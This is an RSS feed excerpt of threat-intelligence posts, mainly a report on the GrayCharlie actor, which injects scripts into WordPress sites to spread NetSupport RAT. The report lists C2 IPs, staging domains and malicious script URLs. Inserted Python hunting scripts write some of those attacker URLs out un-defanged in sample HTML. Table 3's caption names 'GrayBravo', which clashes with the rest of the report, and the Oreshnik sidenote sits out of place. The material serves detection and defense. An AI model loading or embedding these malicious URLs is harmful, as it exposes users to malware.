          <li>Exploitation of legal measures, including sudden contract disputes or claims of force majeure</li>
          <li>More frequent cessation of oil and gas supplies, especially during high-demand periods such as winter</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> higher energy bills and supply disruption, potentially leading to public dissatisfaction</li>
          <li><strong>Private:</strong> price shocks, supply uncertainty, costs related to resolving alleged contract disputes</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Diversify suppliers and routes</li>
          <li>Ensure on-site backup generation where feasible</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_17cedbb65db54e421fed3abc0cc62f5ed6f6fa0aa.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[2025 Cloud Threat Hunting and Defense Landscape]]></title>
            <link>https://www.recordedfuture.com/research/2025-cloud-threat-hunting-defense-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/2025-cloud-threat-hunting-defense-landscape</guid>
            <pubDate>Thu, 19 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Threat actors are doubling down on cloud infrastructure — exploiting misconfigurations, abusing native services, and pivoting through hybrid environments to maximize impact. See how attack patterns are evolving across exploitation, ransomware, credential abuse, and AI service targeting in this latest cloud threat roundup.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group continues to observe growth in the activity of threat actors that leverage and exploit cloud infrastructure to broaden the number of victims they target and infect. Recent reporting across the observed incidents shows that cloud-focused threats are converging on a few consistent patterns, which serve as the main sections of this report:</p>
        <ul>
          <li>Exploitation and Misconfiguration</li>
          <li>Cloud Abuse</li>
          <li>Cloud Ransomware</li>
          <li>Credential Abuse, Account Takeover, and Unauthorized Access</li>
          <li>Third-Party Compromise</li>
        </ul>
        <p>Across cases, initial access frequently comes from vulnerable or misconfigured services exposed to the internet — including application delivery controllers, monitoring dashboards, email security gateways, and enterprise resource planning (ERP) platforms — as well as stolen or weakly governed credentials sourced from public leaks, compromised developer workstations, and socially engineered helpdesk workflows. Once inside a targeted environment, threat actors systematically pivot through hybrid identity and virtual private network (VPN) infrastructure, targeting directory-synchronized accounts, non-human and executive identities, and privileged cloud roles to gain tenant-wide administrative control.</p>
        <p>Post-compromise activity is characterized by heavy use of built-in cloud and SaaS functionality: enumerating and exfiltrating data via native storage and backup services, destroying or encrypting cloud backups and snapshots for impact, manipulating static frontends and continuous integration/continuous deployment (CI/CD) pipelines to subvert trust in applications and repositories, and using mainstream platforms such as calendar services as covert command-and-control (C2) channels.</p>
        <p>In comparison to its previous <a href="https://www.recordedfuture.com/research/cloud-threat-hunting-defense-landscape">iteration</a>, the majority of the events discussed in this report indicate that threat actors are engaging in similar threat behaviors; however, there are three specific trends that appear to have emerged since the most recent iteration:</p>
        <ul>
          <li>Cloud threat actors are registering their own legitimate cloud resources for use in attack chains.</li>
          <li>DDoS attacks are becoming less effective when targeting cloud environments, even in instances of record-breaking throughput, due to increased cloud-native capabilities for mitigating these threats.</li>
          <li>Cloud threat actors are increasingly diversifying the types of services that they target in victim environments during an attack chain, with a notable focus on LLM and other AI-powered services hosted in cloud environments.</li>
        </ul>
        <p>The trends associated with abuse indicate a shift in threat actor perception, demonstrating that threat actors are exploring the broader benefits that compromised cloud services can provide.</p>
        <p><strong><a href="https://assets.recordedfuture.com/Executive-Insights/CTA-20260219_Cloud_Threat_Landscape_Exec_Report.pdf">Download Cloud Threat Landscape: Executive Insights</a></strong></p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_1dd2d1174c3e28d579004a1fe4f44c24107a72547.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[GrayCharlie Hijacks Law Firm Sites in Suspected Supply-Chain Attack]]></title>
            <link>https://www.recordedfuture.com/research/graycharlie-hijacks-law-firm-sites-suspected-supply-chain-attack</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/graycharlie-hijacks-law-firm-sites-suspected-supply-chain-attack</guid>
            <pubDate>Wed, 18 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[GrayCharlie turns compromised WordPress sites into malware delivery machines. Discover how this threat actor chains fake browser updates and ClickFix lures to deploy NetSupport RAT, Stealc, and SectopRAT.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group has been monitoring GrayCharlie, a threat actor overlapping with SmartApeSG and active since mid-2023, for some time, and is now publishing its first report on the group. GrayCharlie compromises WordPress sites and injects them with links to externally hosted JavaScript that redirects visitors to NetSupport RAT payloads delivered via fake browser update pages or ClickFix mechanisms. These infections often progress to the deployment of Stealc and SectopRAT. Insikt Group identified a large amount of infrastructure linked to GrayCharlie, primarily tied to MivoCloud and HZ Hosting Ltd. This includes NetSupport RAT command-and-control (C2) servers, both actor-controlled and compromised staging infrastructure, and higher-tier infrastructure used to administer operations. While most compromised websites appear to be opportunistic and span numerous industries, Insikt Group identified a cluster of United States (US) law firm sites that were likely compromised around November 2025, possibly through a supply-chain compromise involving a shared IT provider.</p>
        <p>To protect against GrayCharlie, security defenders should block IP addresses and domains tied to associated remote access trojans (RATs) and infostealers, flag and potentially block connections to compromised websites, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the <strong>Mitigations</strong> section of this report for implementation guidance and <strong>Appendix A</strong> for a complete list of indicators of compromise (IoCs).</p>
        <h2>Key Findings</h2>
        <ul>
          <li>GrayCharlie, which overlaps with SmartApeSG and first emerged in mid-2023, is a threat actor that injects links to externally hosted JavaScript into compromised WordPress sites. These links redirect victims to NetSupport RAT infections delivered via fake browser update pages or ClickFix techniques, ultimately resulting in Stealc and SectopRAT infections.</li>
          <li>Insikt Group identified a wide range of GrayCharlie infrastructure, largely associated with MivoCloud and HZ Hosting Ltd. This includes NetSupport RAT command-and-control (C2) servers, staging infrastructure made up of both actor-controlled and compromised infrastructure, as well as components of GrayCharlie’s higher-tier infrastructure used to manage its operations.</li>
          <li>Insikt Group identified two primary attack chains associated with GrayCharlie: one in which victims encounter fake browser update pages after visiting compromised websites, and another in which they are presented with a ClickFix pop-up, a technique that has become increasingly common in 2025.</li>
        </ul>
        <h2>Background</h2>
        <p>GrayCharlie is Insikt Group’s designation for a threat activity group that first appeared in mid-2023 and is behind SmartApeSG, also referred to as ZPHP or HANEYMANEY. The group’s operations typically involve injecting malicious JavaScript into legitimate but compromised WordPress sites. Visitors to these sites are shown convincing, browser-specific fake update prompts (such as for Chrome, Edge, or Firefox) that encourage them to download what appears to be an update but is actually malware.</p>
        <p>In late March or early April 2025, SmartApeSG <a href="https://www.malware-traffic-analysis.net/2025/06/18/index.html">shifted</a> from using fake browser updates to deploying ClickFix lures, mirroring a broader trend among threat actors of increasingly adopting ClickFix.</p>
        <p>GrayCharlie predominantly delivers NetSupport RAT; however, deployments of Stealc and, more recently, SectopRAT, have been observed in rare instances. The group’s ultimate objectives remain uncertain. Current evidence suggests a focus on data theft and financial gain, with a theoretical, but unsubstantiated, possibility that it may sell or transfer access to other threat actors.</p>
        <h2>Threat Analysis</h2>
        <p>Insikt Group has been tracking GrayCharlie for an extended period and has observed the actor’s persistent behavior since its emergence in 2023. GrayCharlie continues to conduct the same types of operations, regularly deploying large volumes of new infrastructure and adhering to consistent tactics, techniques, and procedures (TTPs), including continued use of the same infection chains and NetSupport RAT payloads. The group targets organizations worldwide, with a particular focus on the US. The following sections provide a detailed examination of GrayCharlie’s operational infrastructure and its two primary attack chains.</p>
        <h3>Infrastructure Analysis</h3>
        <h4>NetSupport RAT Clusters</h4>
        <p>Insikt Group identified two main NetSupport RAT clusters linked to GrayCharlie based on factors such as TLS certificates, NetSupport serial numbers and license keys, and the timing of the activity (see <strong>Figure 1</strong>). In addition, Insikt Group identified a range of other NetSupport RAT C2 servers linked to GrayCharlie activity, but which are not currently attributed to either of the two main clusters. Insikt Group assesses that these clusters may correspond either to different individuals associated with GrayCharlie or to distinct GrayCharlie campaigns. The clusters are further described below.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_14fd6cf6079b29690c9ef99e5ec9308e54ce5364d.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="618" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Overview of GrayCharlie clusters observed in 2025 (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h5>Cluster 1</h5>
        <p>Cluster 1 comprises NetSupport RAT C2 servers whose TLS certificates display a recurring monthly naming pattern. All servers in this cluster are hosted by MivoCloud and were deployed between March and August 2025. Notably, NetSupport RAT samples associated with the cluster’s March and April infrastructure used the license key <code>DCVTTTUUEEW23</code> and serial number <code>NSM896597</code>, before shifting to the license key <code>EVALUSION</code> and serial number <code>NSM165348</code> in subsequent deployments. The C2 servers associated with this cluster are listed in <strong>Table 1</strong>.</p>
        <table>
          <thead>
            <tr>
              <th>IP Address</th>
              <th>TLS Common Name</th>
              <th>License Key</th>
              <th>Serial Number</th>
            </tr>
          </thead>
          <tbody>
            <tr><td>194[.]180[.]191[.]51</td><td>mar5</td><td>DCVTTTUUEEW23</td><td>NSM896597</td></tr>
            <tr><td>194[.]180[.]191[.]168</td><td>mar4</td><td>DCVTTTUUEEW23</td><td>NSM896597</td></tr>
            <tr><td>194[.]180[.]191[.]171</td><td>mar3</td><td>DCVTTTUUEEW23</td><td>NSM896597</td></tr>
            <tr><td>5[.]181[.]159[.]60</td><td>mar1</td><td>DCVTTTUUEEW23</td><td>NSM896597</td></tr>
            <tr><td>194[.]180[.]191[.]17</td><td>mar2</td><td>DCVTTTUUEEW23</td><td>NSM896597</td></tr>
            <tr><td>94[.]158[.]245[.]66</td><td>apr2</td><td>DCVTTTUUEEW23</td><td>NSM896597</td></tr>
            <tr><td>94[.]158[.]245[.]81</td><td>apr3</td><td>DCVTTTUUEEW23</td><td>NSM896597</td></tr>
            <tr><td>185[.]225[.]17[.]74</td><td>apr4</td><td>DCVTTTUUEEW23</td><td>NSM896597</td></tr>
            <tr><td>194[.]180[.]191[.]189</td><td>apr1</td><td>DCVTTTUUEEW23</td><td>NSM896597</td></tr>
            <tr><td>5[.]252[.]178[.]123</td><td>may5</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>94[.]158[.]245[.]104</td><td>may1</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>94[.]158[.]245[.]115</td><td>may2</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>94[.]158[.]245[.]118</td><td>may3</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>94[.]158[.]245[.]131</td><td>may4</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>94[.]158[.]245[.]137</td><td>may53</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>94[.]158[.]245[.]13</td><td>june2</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>94[.]158[.]245[.]174</td><td>june6</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>94[.]158[.]245[.]140</td><td>june1</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>185[.]163[.]45[.]30</td><td>june7</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>94[.]158[.]245[.]63</td><td>june3</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>94[.]158[.]245[.]111</td><td>june7</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>94[.]158[.]245[.]135</td><td>june5ebatquot</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>5[.]252[.]178[.]23</td><td>july9</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>185[.]163[.]45[.]41</td><td>july1</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>185[.]163[.]45[.]61</td><td>july3</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>185[.]163[.]45[.]73</td><td>july4</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>185[.]163[.]45[.]87</td><td>july6</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>185[.]163[.]45[.]97</td><td>july8</td><td>EVALUSION</td><td>NSM165348</td></tr>
            <tr><td>185[.]163[.]45[.]130</td><td>july9</td><td>EVALUSION</td><td>NSM165348</td></tr>
          </tbody>
        </table>
        <p><em><strong>Table 1:</strong></em> <em>NetSupport RAT C2 servers linked to Cluster 1 (Source: Recorded Future)</em></p>
<p>Notably, the NetSupport RAT C2 servers in Cluster 1 are connected not only through the characteristics previously described, but also by the near-simultaneous creation of their TLS certificates. For example, the TLS certificate with the common name <code>june5ebatquot</code> associated with IP address <em>94[.]158[.]245[.]135</em> was generated on June 30, 2025 at 4:55:20 PM, while the certificate with the common name <code>june6</code> linked to <em>94[.]158[.]245[.]174</em> was created only 20 seconds later.</p>
        <h5>Cluster 2</h5>
        <p>Cluster 2 comprises NetSupport RAT command-and-control servers whose TLS certificates typically start with two or more repetitions of “s”, followed by an “i” and a number (so “<code>sssi3</code>”, for example). NetSupport RAT samples linked to Cluster 2 used the license key <code>XMLCTL</code> and serial number <code>NSM303008</code>. The NetSupport RAT C2 servers typically also host an instance of the vulnerability scanner Acunetix. The C2 servers associated with this cluster are listed in <strong>Table 2</strong>. Notably, all TLS certificates associated with this cluster were created in a single batch on June 17, 2025.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>TLS Common Name</strong></div>
            <div><strong>License Key</strong></div>
            <div><strong>Serial Number</strong></div>
          </div>
          <div>
            <div>5[.]181[.]159[.]112</div>
            <div>sssi3</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]9</div>
            <div>ssi1</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]38</div>
            <div>sssi2</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]140</div>
            <div>ssssi6</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]143</div>
            <div>ssssi8</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]142</div>
            <div>sssssi7</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]139</div>
            <div>ssssi5</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
        </div>
        <p><em><strong>Table 2:</strong></em> <em>NetSupport RAT C2 servers linked to Cluster 2 (Source: Recorded Future)</em></p>
<p>Of note, one NetSupport RAT C2 server (<em>94[.]158[.]245[.]56</em>) used a TLS certificate with the common name <code>23sss</code>, created in May 2025, and was linked to a NetSupport RAT sample that carried the same license key (<code>EVALUSION</code>) and serial number (<code>NSM165348</code>) previously observed in Cluster 1.</p>
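<p>As an added illustration (not code from the report), the following Python script turns the two pivots described for Cluster 1 and Cluster 2 into a hunting check: it classifies TLS common names by the shapes above and groups certificates whose creation times fall within seconds of each other. The observations are constructed for the example; only the June 30 pair carries the timestamps quoted above, and the other timestamps are assumed.</p>

```python
import re
from datetime import datetime, timedelta

# Common-name shapes described for the two clusters: Cluster 2 uses two or more
# "s" followed by "i" and a number (sssi3); Cluster 1 uses a month name and a
# digit, occasionally with trailing characters (june6, june5ebatquot).
CN_PATTERNS = {
    "cluster2_ssi": re.compile(r"^s{2,}i\d+$"),
    "cluster1_month": re.compile(r"^(june|july)\d+[a-z]*$"),
}

# Constructed sample observations. IPs and common names come from Tables 1 and 2;
# only the June 30 pair carries the timestamps quoted in the text, the other
# not_before values are invented for this example.
SAMPLE_CERTS = [
    {"ip": "94[.]158[.]245[.]135", "cn": "june5ebatquot", "not_before": datetime(2025, 6, 30, 16, 55, 20)},
    {"ip": "94[.]158[.]245[.]174", "cn": "june6", "not_before": datetime(2025, 6, 30, 16, 55, 40)},
    {"ip": "5[.]181[.]159[.]112", "cn": "sssi3", "not_before": datetime(2025, 6, 17, 10, 0, 0)},
    {"ip": "5[.]181[.]159[.]9", "cn": "ssi1", "not_before": datetime(2025, 6, 17, 10, 0, 15)},
    {"ip": "5[.]181[.]159[.]38", "cn": "sssi2", "not_before": datetime(2025, 6, 17, 10, 0, 31)},
    {"ip": "198[.]51[.]100[.]7", "cn": "www.example.org", "not_before": datetime(2025, 3, 2, 8, 0, 0)},
]


def classify_cn(cn):
    """Return the cluster label whose common-name pattern matches, else None."""
    for label, pattern in CN_PATTERNS.items():
        if pattern.match(cn.lower()):
            return label
    return None


def find_issuance_batches(certs, window=timedelta(seconds=60)):
    """Sort by not_before and group certificates that were each issued within
    `window` of the previous one. Only groups of two or more are returned."""
    ordered = sorted(certs, key=lambda c: c["not_before"])
    batches, current = [], []
    for cert in ordered:
        if current and cert["not_before"] - current[-1]["not_before"] <= window:
            current.append(cert)
        else:
            if len(current) >= 2:
                batches.append(current)
            current = [cert]
    if len(current) >= 2:
        batches.append(current)
    return batches


def cluster_certs(certs, window=timedelta(seconds=60)):
    """Combine both pivots: CN-pattern membership and near-simultaneous issuance."""
    by_label = {}
    for cert in certs:
        label = classify_cn(cert["cn"])
        if label:
            by_label.setdefault(label, []).append(cert["ip"])
    return by_label, find_issuance_batches(certs, window)


if __name__ == "__main__":
    labels, batches = cluster_certs(SAMPLE_CERTS)
    print(labels)
    for batch in batches:
        print("issued together:", [c["cn"] for c in batch])
```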
        <h5>Other NetSupport RAT C2 Servers</h5>
        <p>Insikt Group identified an additional set of NetSupport RAT C2 servers linked to GrayCharlie that did not form a distinct cluster (see <strong>Table 3</strong>). However, all the servers were hosted by MivoCloud and were associated with NetSupport RAT samples using license key and serial number combinations observed in Clusters 1 and 2.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>TLS Common Name</strong></div>
            <div><strong>License Key</strong></div>
            <div><strong>Serial Number</strong></div>
          </div>
          <div>
            <div>5[.]181[.]159[.]29</div>
            <div>ssdecservicsdes</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]18</div>
            <div>papichssd2</div>
            <div>DCVTTTUUEEW2</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]153</div>
            <div>kosmo2</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]170</div>
            <div>normvork</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]62</div>
            <div>ffdds</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>5[.]181[.]156[.]234</div>
            <div>wedn1</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]252[.]178[.]35</div>
            <div>scgs234123</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]209</div>
            <div>novemsdf</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]156[.]244</div>
            <div>wends4</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]121</div>
            <div>novaksuur</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>5[.]252[.]177[.]120</div>
            <div>lohsd</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]252[.]177[.]15</div>
            <div>bounce</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]16</div>
            <div>update1</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
        </div>
        <p><em><strong>Table 3:</strong></em> <em>Additional NetSupport RAT C2 servers linked to GrayBravo (Source: Recorded Future)</em></p>
        <h4>Staging Infrastructure</h4>
        <p>Once GrayCharlie victims land on the compromised WordPress sites, thereby satisfying the conditional logic, the payload is typically fetched from the attacker-controlled infrastructure and injected into the compromised WordPress sites. Insikt Group has identified two distinct types of staging infrastructure, each characterized by different website templates. Type 1 is modeled after “Wiser University,” and Type 2 is modeled after “Activitar.”</p>
        <h5>Type 1: “Wiser University”</h5>
        <p>The IP addresses associated with the Type 1 staging infrastructure are linked to websites impersonating “Wiser University” (see <strong>Figure 2</strong>), a fictional entity used to demonstrate Wiser, a free Bootstrap HTML5 education <a href="https://themewagon.com/themes/free-bootstrap-4-html5-education-website-template-wiser/">website template</a> for school, college, and university websites. (As a sidenote, Oreshnik is the name of a Russian intermediate-range ballistic missile reportedly capable of speeds exceeding Mach 10.) <strong>Appendix B</strong> lists the IP addresses associated with the Type 1 staging infrastructure. All IP addresses, except for one, are announced by AS202015 (HZ Hosting Ltd).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1500e0d2021b91244c59d04e70097054a1c748693.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Website impersonating “Wiser University” (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h6>Suspected Testing Infrastructure</h6>
        <p>Although most IP addresses associated with the Type 1 staging infrastructure are announced by AS202015, as shown in <strong>Appendix B</strong>, Insikt Group also identified a small subset announced by other ASNs that host the same websites (see <strong>Table 4</strong>). On average, approximately one such IP address appears to be established each month. Notably, most of these IP addresses appear to geolocate to Russia, and the same ASNs are consistently reused within the same timeframe.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
            <div><strong>Country</strong></div>
            <div><strong>Date of Emergence</strong></div>
          </div>
          <div>
            <div>89[.]253[.]222[.]25</div>
            <div>AS41535</div>
            <div>RU</div>
            <div>2025-08-29</div>
          </div>
          <div>
            <div>89[.]253[.]222[.]156</div>
            <div>AS41535</div>
            <div>RU</div>
            <div>2025-08-26</div>
          </div>
          <div>
            <div>89[.]169[.]12[.]48</div>
            <div>AS207957</div>
            <div>GB</div>
            <div>2025-07-08</div>
          </div>
          <div>
            <div>185[.]231[.]245[.]158</div>
            <div>AS202984</div>
            <div>RU</div>
            <div>2025-06-27</div>
          </div>
          <div>
            <div>95[.]182[.]123[.]86</div>
            <div>AS202984</div>
            <div>RU</div>
            <div>2025-05-19</div>
          </div>
          <div>
            <div>23[.]140[.]40[.]66</div>
            <div>AS61400</div>
            <div>RU</div>
            <div>2025-04-11</div>
          </div>
          <div>
            <div>217[.]114[.]15[.]253</div>
            <div>AS198610</div>
            <div>RU</div>
            <div>2025-04-09</div>
          </div>
          <div>
            <div>45[.]153[.]191[.]245</div>
            <div>AS198610</div>
            <div>RU</div>
            <div>2025-03-21</div>
          </div>
          <div>
            <div>46[.]29[.]163[.]28</div>
            <div>AS51659</div>
            <div>RU</div>
            <div>2025-02-06</div>
          </div>
        </div>
        <p><em><strong>Table 4:</strong></em> <em>Additional infrastructure possibly linked to GrayCharlie (Source: Recorded Future)</em></p>
        <h5>Type 2: “Activitar”</h5>
        <p>Insikt Group identified an additional set of staging infrastructure, referred to as “Type 2.” The IP addresses in this cluster commonly host specific websites (see <strong>Figure 3</strong>). Insikt Group assesses that this template was sourced elsewhere and is not unique to GrayCharlie.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1156a61a7697db00d450ae4f44a3a4252c377b599.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Website impersonating “Activitar” (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>A subset of domains and IP addresses associated with Type 2 is presented in <strong>Table 5</strong>. Notably, most of the IP addresses are also announced by AS202015 (HZ Hosting Ltd), and one domain in <strong>Table 5</strong>, <em>filmlerzltyazilimsx[.]shop</em>, is linked to the email address <em>oreshnik[@]mailum[.]com</em> through its WHOIS record.</p>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
          </div>
          <div>
            <div>filmlerzltyazilimsx[.]shop</div>
            <div>79[.]141[.]163[.]169</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>foolowme[.]com</div>
            <div>144[.]172[.]115[.]211</div>
            <div>AS14956</div>
          </div>
          <div>
            <div>joiner[.]best</div>
            <div>79[.]141[.]162[.]135</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>lowi1[.]com</div>
            <div>185[.]33[.]86[.]11</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>morniksell[.]com</div>
            <div>172[.]86[.]90[.]84</div>
            <div>AS14956</div>
          </div>
          <div>
            <div>persistancejs[.]store</div>
            <div>185[.]80[.]53[.]79</div>
            <div>AS59711</div>
          </div>
          <div>
            <div>pomofight[.]com</div>
            <div>45[.]61[.]134[.]76</div>
            <div>AS14956</div>
          </div>
          <div>
            <div>port4loms[.]com</div>
            <div>194[.]15[.]216[.]118</div>
            <div>AS197155</div>
          </div>
          <div>
            <div>signaturepl[.]com</div>
            <div>77[.]83[.]199[.]162</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>yungask[.]com</div>
            <div>91[.]193[.]19[.]220</div>
            <div>AS202015</div>
          </div>
        </div>
        <p><em><strong>Table 5:</strong></em> <em>Domains and IP addresses linked to Type 2 staging infrastructure (Source: Recorded Future)</em></p>
        <h4>Compromised Infrastructure</h4>
        <p>GrayCharlie commonly injects malicious scripts into the Document Object Model (DOM) of compromised WordPress sites using script tags. Insikt Group has identified several recurring URL patterns tied to this activity: some URLs load externally hosted JavaScript files (such as <em>hxxps://joiner[.]best/work/original[.]js</em>), while others call a PHP file on specific endpoints <a href="https://urlscan.io/result/0199e8a3-1d07-76d2-9ccb-39ea171d3744/dom">using</a> an ID parameter (such as <em>hxxps://signaturepl[.]com/work/index[.]php?abje2LAw</em>). Notably, these URLs are updated over time by the threat actor, complicating detection and indicating the threat actor maintains ongoing access to a large pool of compromised WordPress installations. <strong>Appendix A</strong> lists a subset of WordPress websites infected by GrayCharlie.</p>
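<p>As an added example (not part of the report), this Python check scans a page's <code>&lt;script src&gt;</code> attributes for the two URL shapes just described, an external <code>/work/original.js</code> and a <code>/work/index.php</code> call whose whole query string is a bare ID; the page source is constructed for the example and the site hostname is assumed.</p>

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# URL shapes described in the text: an externally hosted /work/original.js and
# a /work/index.php call whose whole query string is a bare ID (no key=value).
KNOWN_PATHS = [re.compile(r"/work/original\.js$", re.I),
               re.compile(r"/work/index\.php$", re.I)]
BARE_ID_QUERY = re.compile(r"^[A-Za-z0-9]{6,16}$")

# Constructed page source for the example. The two injected script tags reuse
# URL shapes quoted in the report; the other two are ordinary site assets.
SAMPLE_HTML = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://www.googletagmanager.com/gtag/js?id=G-XXXXXX"></script>
<script src="https://joiner.best/work/original.js"></script>
</head><body>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://signaturepl.com/work/index.php?abje2LAw"></script>
</body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in the document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def find_injected_scripts(html, page_host):
    """Return external script sources matching the patterns, with the reason(s)."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        parts = urlsplit(src)
        host = parts.netloc.lower()
        if not host or host == page_host.lower():
            continue  # relative or same-origin scripts are out of scope here
        reasons = []
        if any(p.search(parts.path) for p in KNOWN_PATHS):
            reasons.append("known_path")
        if parts.path.lower().endswith("index.php") and BARE_ID_QUERY.match(parts.query):
            reasons.append("bare_id_query")
        if reasons:
            findings.append({"src": src, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    # Assumed hostname of the site being checked.
    for hit in find_injected_scripts(SAMPLE_HTML, "www.example-lawfirm.com"):
        print(hit)
```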
        <p>Although the exact initial access vector is unknown, it is likely that the actors either purchase access, such as via malware logs containing WordPress admin credentials, or exploit vulnerable WordPress plugins. The latter <a href="https://www.wp-1click.com/blog/how-hackers-target-wordpress-sites/">remains</a> the most frequent cause of all WordPress compromises.</p>
<h4>Suspected Compromise of “Law Firm Acceleration Company” SMB Team</h4>
        <p>While the GrayCharlie-linked compromised WordPress sites span a wide range of industry verticals, in a few rare instances, the threat actors appear to have obtained, either through their own intrusions or via a third party, a more targeted set of WordPress domains. Specifically, at least fifteen websites belonging to US law firms were observed loading the external JavaScript hosted at <em>hxxps://persistancejs[.]store/work/original[.]js</em> (see <strong>Table 6</strong>).</p>
        <p>Insikt Group assesses that GrayCharlie (or the third party GrayCharlie works with) likely compromised these websites through a supply-chain vector. One potential avenue is SMB Team, the self-described “fastest-growing law firm acceleration company,” which has supported thousands of firms across North America, according to its website, as its logo and other references appear across many of the websites listed in <strong>Table 6</strong> (see <strong>Figure 4</strong>). Notably, credentials associated with an SMB Team email address used for a WordPress hosting platform surfaced around the same time that the domain <em>persistancejs[.]store</em> first began resolving. This temporal overlap suggests that the threat actors may have gained access to SMB Team-related infrastructure through the use of legitimate, compromised credentials.</p>
        <div>
          <div>
